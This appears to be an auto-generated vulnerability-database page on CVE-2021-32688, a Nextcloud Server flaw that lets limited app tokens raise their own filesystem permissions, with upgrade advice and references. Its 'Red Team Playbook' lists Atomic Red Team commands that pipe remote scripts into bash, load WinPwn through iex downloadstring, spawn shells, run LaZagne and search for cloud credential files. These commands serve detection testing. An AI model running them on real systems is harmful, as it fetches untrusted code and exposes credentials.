CVE-2021-32688
Overview
This vulnerability is an authorization bypass in Nextcloud Server's application-specific token management. The root cause is a missing permission check that allows tokens, intended to have restricted filesystem access, to escalate their own privileges. The affected component is the token permission handling mechanism within Nextcloud Server versions prior to 19.0.13, 20.0.11, and 21.0.3.
Vulnerability Description
Nextcloud Server is a Nextcloud package that handles data storage. Nextcloud Server supports application specific tokens for authentication purposes. These tokens are supposed to be granted to a specific applications (e.g. DAV sync clients), and can also be configured by the user to not have any filesystem access. Due to a lacking permission check, the tokens were able to change their own permissions in versions prior to 19.0.13, 20.0.11, and 21.0.3. Thus fileystem limited tokens were able to grant themselves access to the filesystem. The issue is patched in versions 19.0.13, 20.0.11, and 21.0.3. There are no known workarounds aside from upgrading.
Impact
An attacker with a valid application-specific token that has limited filesystem permissions can escalate those permissions to gain unauthorized filesystem access. This requires the attacker to have at least limited authentication privileges (PR:L) but no user interaction (UI:N) and network access (AV:N). The consequence is unauthorized data access and potential data manipulation or exfiltration, impacting confidentiality, integrity, and availability as indicated by the CVSS vector (C:H/I:H/A:H).
Solution
Upgrade Nextcloud Server to versions 19.0.13, 20.0.11, or 21.0.3 or later as these versions contain patches that enforce proper permission checks on token modifications. Fedora users should apply updates from Fedora 33 and 34 security advisories linked in the vendor announcements. Detailed patch instructions and advisory references are available at the Nextcloud security advisories repository (https://github.com/nextcloud/security-advisories/security/advisories/GHSA-48m7-7r2r-838r) and Fedora package announcement mailing lists.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Nextcloud Server arises from inadequate permission checks associated with application-specific tokens used for authentication. These tokens are designed to be granted to specific applications, such as DAV sync clients, and can be configured by users to limit filesystem access. However, in versions prior to 19.0.13, 20.0.11, and 21.0.3, the lack of proper validation allowed tokens with restricted permissions to elevate their own access rights. This flaw effectively enabled unauthorized access to the filesystem, undermining the security model intended to protect sensitive data stored within Nextcloud.
Exploitation of this vulnerability can occur through various attack vectors. An attacker with access to a compromised application or an application that utilizes the affected authentication tokens could manipulate these tokens to gain elevated permissions. For instance, if an attacker successfully obtains a token that is supposed to have limited access, they could exploit the vulnerability to modify its permissions, thereby allowing unrestricted access to the filesystem. This scenario could unfold in environments where multiple applications interact with the Nextcloud Server, particularly in cases where user oversight is minimal or where security policies are not strictly enforced.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on Nextcloud for data storage and collaboration. The potential for unauthorized access to sensitive files could lead to data breaches, loss of intellectual property, or exposure of personally identifiable information (PII). Such incidents not only pose legal and regulatory risks but can also damage an organization’s reputation and erode customer trust. The financial repercussions of a data breach can be substantial, encompassing costs related to incident response, legal fees, and potential fines from regulatory bodies.
To detect and mitigate the risks associated with this vulnerability, organizations should prioritize upgrading to the patched versions of Nextcloud Server. Regularly updating software is a fundamental aspect of a robust cybersecurity strategy, as it ensures that known vulnerabilities are addressed promptly. Additionally, organizations should implement comprehensive monitoring and logging practices to detect any anomalous behavior that may indicate exploitation attempts. Employing application security best practices, such as conducting regular security assessments and penetration testing, can further bolster defenses against potential threats.
In conclusion, the vulnerability in Nextcloud Server presents a serious risk due to its ability to allow unauthorized filesystem access through manipulated application-specific tokens. Organizations utilizing this platform must take immediate action to upgrade to the secure versions and adopt proactive security measures to safeguard their data. By understanding the technical details, potential attack vectors, and real-world impacts, businesses can better prepare themselves against exploitation and maintain the integrity of their data storage solutions.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Nextcloud | Nextcloud Server | All |
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*
|
|
|
Nextcloud | Nextcloud Server | All |
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*
|
|
|
Nextcloud | Nextcloud Server | All |
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 33 |
cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*
|
|
|
Fedoraproject | Fedora | 34 |
cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-639 | Probe System Files |
30%
|
— | Medium | |
| CAPEC-150 | Collect Data from Common Resource Locations |
30%
|
— | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-32688 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/nextcloud/security-advisories/security/advisories/GHSA-48m7-7r2r-838r |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/nextcloud/server/pull/27000 |
| hackerone.com |
GitHub CVE
x_refsource_MISC
|
https://hackerone.com/reports/1193321 |
| lists.fedoraproject.org |
GitHub CVE
vendor-advisory
x_refsource_FEDORA
|
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/J63NBVPR2AQCAWRNDOZSGRY5II4WS2CZ/ |
| lists.fedoraproject.org |
GitHub CVE
vendor-advisory
x_refsource_FEDORA
|
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BVZS26RDME2DYTKET5AECRIZDFUGR2AZ/ |
| security.gentoo.org |
GitHub CVE
vendor-advisory
x_refsource_GENTOO
|
https://security.gentoo.org/glsa/202208-17 |